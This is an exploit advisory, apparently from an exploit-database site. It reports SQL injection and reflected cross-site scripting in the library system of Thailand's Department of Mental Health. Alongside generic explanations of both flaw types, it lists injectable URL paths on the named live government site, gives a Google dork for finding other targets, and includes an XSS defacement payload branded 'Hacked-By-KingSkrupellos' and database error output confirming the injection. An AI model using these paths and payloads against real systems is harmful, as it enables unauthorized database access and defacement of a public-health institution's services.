Thailand Ministry of Public and Mental Health Union Library Management SQL Injection - Reflected Cro

###################################################################

# Exploit Title : Thailand Ministry of Public and Mental Health Union Library Management SQL Injection - Reflected Cross Site Scripting
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/04/2019
# Vendor Homepage : dmh.go.th
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : Library dmh.go.th ULibM (Union Library Management)
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
* Thailand Ministry of Public Health Department of Mental Health 

is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied 

data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise

the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

A remote attacker can send a specially crafted request to the vulnerable application and 

execute arbitrary SQL commands in application`s database. Further exploitation of this 

vulnerability may result in unauthorized data manipulation. 

An attacker can exploit this issue using a browser or with any SQL Injector Tool.

* Cross Site Scripting : The software does not neutralize or incorrectly neutralizes 

user-controllable input  before it is placed in output that is used as a web 

page that is served to other users.

Cross-site scripting (XSS) vulnerabilities occur when:
**********************************************
1. Untrusted data enters a web application, typically from a web request.
2. The web application dynamically generates a web page that contains this untrusted data.
3. During page generation, the application does not prevent the data from containing 
content that is executable by a web browser, such as JavaScript, HTML tags, 
HTML attributes, mouse events, Flash, ActiveX, etc.
4. A victim visits the generated web page through a web browser, which contains 
malicious script that was injected using the untrusted data.
5. Since the script comes from a web page that was sent by the web server, 
the victim's web browser executes the malicious script in the context of the 
web server's domain.
6. This effectively violates the intention of the web browser's same-origin policy, 
which states that scripts in one domain should not be able to access 
resources or run code in a different domain.

There are three main kinds of XSS:

Type 1: Reflected XSS (or Non-Persistent) :
***************************************
The server reads data directly from the HTTP 
request and reflects it back in the HTTP response. Reflected XSS exploits occur when an 
attacker causes a victim to supply dangerous content to a vulnerable web application, 
which is then reflected back to the victim and executed by the web browser. The most common 
mechanism for delivering malicious content is to include it as a parameter in a URL that is 
posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute 
the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL
that refers to a vulnerable site. After the site reflects the attacker's content back to the victim,
the content is executed by the victim's browser.

Type 2: Stored XSS (or Persistent) :
********************************
The application stores dangerous data in a database, 
message forum, visitor log, or other trusted data store. At a later time, the dangerous data is 
subsequently read back into the application and included in dynamic content. From an attacker's 
perspective, the optimal place to inject malicious content is in an area that is displayed to either 
many users or particularly interesting users. Interesting users typically have elevated privileges
 in the application or interact with sensitive data that is valuable to the attacker. If one of these users 
executes malicious content, the attacker may be able to perform privileged operations on behalf of
 the user or gain access to sensitive data belonging to the user. For example, the attacker might 
inject XSS into a log message, which might not be handled properly when an administrator views the logs.

Type 0: DOM-Based XSS => 
***************************
In DOM-based XSS, the client performs the injection of XSS 
into the page; in the other types, the server performs the injection. DOM-based XSS generally
 involves server-controlled, trusted script that is sent to the client, such as Javascript that 
performs sanity checks on a form before the user submits it. If the server-supplied script 
processes user-supplied data and then injects it back into the web page 
(such as with dynamic HTML), then DOM-based XSS is possible.Once the malicious script is 
injected, the attacker can perform a variety of malicious activities. The attacker could transfer 
private information, such as cookies that may include session information, from the victim's 
machine to the attacker. The attacker could send malicious requests to a web site on behalf 
of the victim, which could be especially dangerous to the site if the victim has administrator 
privileges to manage that site. Phishing attacks could be used to emulate trusted web sites 
and trick the victim into entering a password, allowing the attacker to compromise the 
victim's account on that web site. Finally, the script could exploit a vulnerability in the 
web browser itself possibly taking over the victim's machine, sometimes 
referred to as "drive-by hacking."

In many cases, the attack can be launched without the victim even being aware of it. 
Even with careful users, attackers frequently use a variety of methods to encode the 
malicious portion of the attack, such as URL encoding or Unicode, so the request 
looks less suspicious.

###################################################################

# SQL Injection Exploit :
**********************
/dmh/searching.php?MSUBJECT=[SQL Injection]

/raja/dublin.php?ID=[SQL Injection]

/camri/search-browse-author.php?&startrow=[SQL Injection]

/sp/search-browse-title.php?&startrow=[SQL Injection]

/sp/webbox/searching.misc/search.php?KW=Research&indexcode=su&startrow=[SQL Injection]

# XSS Cross Site Scripting Exploit :
********************************
/raja/dublin.php?ID=V2%3Cmarquee%3E%3Cfont%20color=
lime%20size=32%3EHacked-By-KingSkrupellos-XSS-Cross-Site-
Scripting-Vulnerability-Found%3C/font%3E%3C/marquee%3E

###################################################################

# Example Vulnerable Sites :
*************************
[+] library.dmh.go.th/raja/dublin.php?ID=562%27

[+] library.dmh.go.th/raja/dublin.php?ID=V2%3Cmarquee%3E%3Cfont%20color=
lime%20size=32%3EHacked-By-KingSkrupellos-XSS-Cross-Site-
Scripting-Vulnerability-Found%3C/font%3E%3C/marquee%3E

###################################################################

# Example SQL Database Error :
****************************
mysqli: You have an error in your SQL syntax; check the manual that corresponds 
to your MariaDB server version for the right syntax to use near '\'' at line 1
select * from media where id =562\' 

mysqli: You have an error in your SQL syntax; check the manual that corresponds 
to your MariaDB server version for the right syntax to use near '\',20' at line 1
select * from index_db order by trim(titl)  LIMIT 80\',20

mysqli: You have an error in your SQL syntax; check the manual that corresponds
to your MariaDB server version for the right syntax to use near '\',20' at line 2
select mid,id from index_db where (ispublish='yes' or remoteindex<>'localDB')
 and   (1  AND (subj like '%Research%') 
 )   order by if(titl = '' or titl is null,1,0),titl asc LIMIT 40\',20

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################

Copyright ©2024 Exploitalert.